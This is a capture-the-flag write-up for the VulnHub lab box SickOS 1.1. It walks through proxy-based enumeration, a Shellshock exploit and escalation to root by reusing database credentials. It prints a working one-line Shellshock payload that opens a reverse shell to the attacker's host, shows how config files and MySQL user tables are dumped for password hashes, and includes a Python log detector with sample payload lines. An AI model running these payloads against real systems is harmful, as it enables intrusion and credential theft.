
CTF / Boot2Root / Sick Os 1.1

If you've not figured it out, this is a write-up and will contain spoilers.

NOTES

Part of my OSCP pre-PWK-pre-exam education path, this is one of many recommended unofficial practice boxes. SickOS details: https://www.vulnhub.com/entry/sickos-11,132/. I'm not a professional penetration tester and I'll probably fall down many rabbit holes, but these are my notes and thought process.

I'll follow this official OSCP exam guide and avoid using Metasploit as much as possible to aid my learning. See notes below;

OSCP Metasploit Usage

You can only use Metasploit Auxiliary, Exploit, and Post modules against one target machine of your choice.
You may use the following against all of the target machines:

  • multi handler (aka exploit/multi/handler)
  • msfvenom
  • pattern_create.rb
  • pattern_offset.rb

OSCP Exam Restrictions

You cannot use any of the following on the exam:

  • Spoofing (IP, ARP, DNS, NBNS, etc)
  • Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
  • Automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc.)
  • Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc.)
  • Features in other tools that utilize either forbidden or restricted exam limitations

This VM including the write-up took ~6 hrs over 3 days (part time), hence the SickOS IP changing in the screenshots. I used OneNote for screenshots/note taking and Kali 64-bit Mate.

Something to listen to: Atomic Blonde ST

KALI SETUP NOTES

Personal preferences

set unlimited terminal scroll back
set copy on highlight
:set paste in VIM when pasting code / auto code indentation is the devil.

ENUMERATION

Start the VM up and it'll gather a DHCP lease. Use arp-scan to query the network for the unknown IP address of the box. The :c2 MAC address matches the SickOS VM configuration, so .132 looks good to me.


Perform an nmap scan of the found SickOS host. My normal choice is either;

[email protected]:~# nmap -sS -p- 192.168.147.132
[email protected]:~# nmap -T4 -A -p- 192.168.147.132

A Squid proxy service is active on port 3128. Set this up in FoxyProxy in Firefox and browse through it.

Opening up a session to the web server now results

/robots.txt reveals a WolfCMS directory. Noted.

Brute force the web server with dirb and a basic dictionary of common/default directories.

[email protected]:~# dirb http://10.0.0.244 /usr/share/wordlists/dirb/small.txt -p http://10.0.0.244:3128

Also found this connect.py script in the web root. Noted.

Onto the next tool of choice; Nikto - Web Vulnerability Scanner (proxy supported).

[email protected]:~# nikto -host=http://192.168.147.132/ --useproxy=http://192.168.147.132:3128

The interesting find here is /cgi-bin/status, which is vulnerable to Shellshock.

EXPLOITATION

My next attempt was to use commix for some basic exploitation of /cgi-bin/ with the Shellshock module; I hadn't used this before. It resulted in nothing. Assuming I hadn't configured it correctly (it was a new tool I was trying out), I wanted to move on quickly.

Reverted to Google to find a few manual methods using wget/curl I've seen in the wild and have used in past CTFs. Just to see if we have command execution, I attempt to pull back SickOS's /etc/passwd.

Now to adapt it to a reverse shell and to set the netcat listener up locally.

[email protected]:~# nc -lvvnp 4444

Remember to set the proxy variable in bash, as the web server is only reachable through the Squid proxy.

[email protected]:~# export http_proxy=192.168.147.132:3128

Run the exploit. The payload goes in the User-Agent header (-U), which the CGI handler exports as an environment variable and which bash then parses as a function definition:

[email protected]:~# wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -i >& /dev/tcp/192.168.147.128/4444 0>&1" http://192.168.147.132/cgi-bin/status

Shell. \o/
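From the defender's side, the request above leaves a trace: Apache's combined access log records the Referer and User-Agent, so the "() {" function-definition prefix that triggers CVE-2014-6271 can be flagged straight from the log. The following is an added example, not code from the original post; the log lines are constructed and the field names are my own.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" format: client ident user [time] "request" status size "referer" "user-agent".
# Quoted fields may contain \" escapes, which is where a Shellshock payload usually sits.
_QUOTED = r'(?:[^"\\]|\\.)*'
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<agent>' + _QUOTED + r')"$'
)
# Vulnerable bash only imported a function when the variable value began with exactly "() {".
_SHELLSHOCK_RE = re.compile(r'^\(\) \{')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = _LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_shellshock_value(value: str) -> bool:
    """True if a header value would be parsed as a function definition by unpatched bash."""
    return bool(_SHELLSHOCK_RE.match(value))


def find_shellshock(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per header field carrying the trigger prefix.
    Note: behind a forward proxy such as Squid on the same host, 'client' may be the
    proxy's own address rather than the real source; correlate with the proxy log."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["request"].split(" ")
        path = parts[1] if len(parts) > 1 else rec["request"]
        for field in ("agent", "referer"):
            if is_shellshock_value(rec[field]):
                hits.append({"client": rec["client"], "time": rec["time"], "path": path,
                             "field": field, "cgi": path.startswith("/cgi-bin/")})
    return hits


# Constructed sample log lines (not taken from the real box).
SAMPLE_LOG = [
    r'192.168.147.128 - - [05/Dec/2015:07:47:16 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { test;};echo \"Content-type: text/plain\"; echo; /usr/bin/id"',
    r'192.168.147.128 - - [05/Dec/2015:07:47:20 +0000] "GET /robots.txt HTTP/1.1" 200 45 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/45.0"',
    r'192.168.147.128 - - [05/Dec/2015:07:48:01 +0000] "GET /wolfcms/ HTTP/1.1" 200 2048 "() { :;}; /usr/bin/id" "curl/7.47.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

A hit on a /cgi-bin/ path on a host running an unpatched bash is the case to treat as confirmed execution rather than a mere probe.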

PRIVILEGE ESCALATION

Now start enumerating the system from within.
Followed for guidance;

Easy credentials found in the CMS config.php for the MySQL database. Noted.

define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', '[email protected]');

The GCC compiler is available, useful for building exploits on the box.

Also, a backup directory is found but is not readable by www-data.

Version of MySQL

I decided to try out a script I came across recently, so I uploaded @rebootuser's LinEnum.sh script to speed up the enumeration process: https://raw.githubusercontent.com/sneakymonk3y/LinEnum/master/LinEnum.sh. I did this by serving it with Python's simple HTTP server and then requesting the files from the SickOS box using wget.

LinEnum's output includes a handy OS overview, including the kernel version, which can be used when searching vulnerability databases (exploit-db).

Bingo. I had already figured most of these out. These are dangerous to have on a production system, so we are on the right lines.

Uploaded linux-exploit-suggester.sh by MZET (https://github.com/mzet-), forked at https://github.com/sneakymonk3y/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh.

Noted output...

Exploits I've heard of and easily available via https://dirtycow.ninja/ and https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs. To back this up, searching Google for "Linux kernel 3.11 priv esc" resulted in the same exploit;


I think I'll stick with Dirty COW as my priv esc for now:
https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c

After sending the exploit code over and compiling it on the box, it crashed. Compiling the code locally and then sending the payload over, it didn't run.

Tried recompiling a few different versions but hit issues. Moving on and back to the WolfCMS / MySQL credentials from earlier. Poking the CMS results in a login form. I tried a few quick SQLi checks, but the form had sanitised the input.


Connecting to the MySQL database with the valid credentials from config.php:


// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', '[email protected]');
define('TABLE_PREFIX', '');

Upon connecting and then disconnecting I noted the strange MySQL shell behaviour: only after I quit is the previous output displayed. I can only assume this is to do with the reverse shell redirection. Nevertheless, I can still work with this.

Quick Google for MySQL commands: https://gist.github.com/hofmannsven/9164408

show databases; use wolf; show tables; 

[email protected]:/tmp$ mysql -u root -p wolf
Enter password: [email protected]
use wolf; show tables; SELECT * FROM user;
quit

user_role id	name	email	username	password	salt	language	last_login	last_failure	failure_count	created_on	updated_on	created_by_id	updated_by_id
1	Administrator	[email protected]	admin	3a1be46a798dce0d880f633ce195b676839a0ce344c917a7ea1270816dcb649ce1e2b811b56fe93c9d3c4e679151180129ee9483ea39bff4d4578c4be6c77e1f	6806b774443f2c34231eceddf156a42d3c26a2b5219ee9d55f5e3c9aea534167	en	2015-12-05 07:47:16	NULL	0	2015-12-05 06:25:06	2015-12-05 07:47:16	1	NULL

[email protected]:/tmp$   

Hmmm, a salted, hashed password. Moving on to the 'user' table in the mysql database.

use mysql; show tables; SELECT * FROM user;

Results in way more credentials!


Quick analysis via GCHQ's CyberChef (an offline version is also available): https://gchq.github.io/CyberChef/#recipe=Analyse_hash()&input=QTdBMjBCOTNFQzA3NjMxMUE2M0JGODZCNUM3MDVCMjVDMDU0REQ3Nw. This results in a suspected SHA-1 hash.

Hash length: 40
Byte length: 20
Bit length:  160

Based on the length, this hash could have been generated by one of the following hashing functions:
SHA-1
SHA-0
FSB-160
HAS-160
HAVAL-160
RIPEMD-160
Tiger-160

For this hash [A7A20B93EC076311A63BF86B5C705B25C054DD77] I'll just upload to https://crackstation.net. WIN! Already cracked ;) - and it's the same password as earlier!

FINAL NOTES

I don't believe I had the password all along; I was side-tracked by attempting the Dirty COW priv esc and the WolfCMS admin panel before hitting the MySQL user database tables! For me, the lesson is to remember to spray found credentials against exposed services for quick wins early on. Preventing rabbit-holing is something I'll learn with time, gut feeling and all.

Finally got commix to work too. It was missing http:// from the proxy argument. I guessed right: misconfigured. :)

~Mark


TL;DR

Exploit the Apache web server (via the Squid proxy) with Shellshock, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, then enumerate the local hard-coded MySQL database account to pull other database user accounts whose credentials can be re-used to log in via SSH and gain root.

Other notable solutions;
https://crowdshield.com/blog.php?name=sickos-1.1-solution-by-1n3
http://www.security-exposed.com/2017/01/sickos-11.html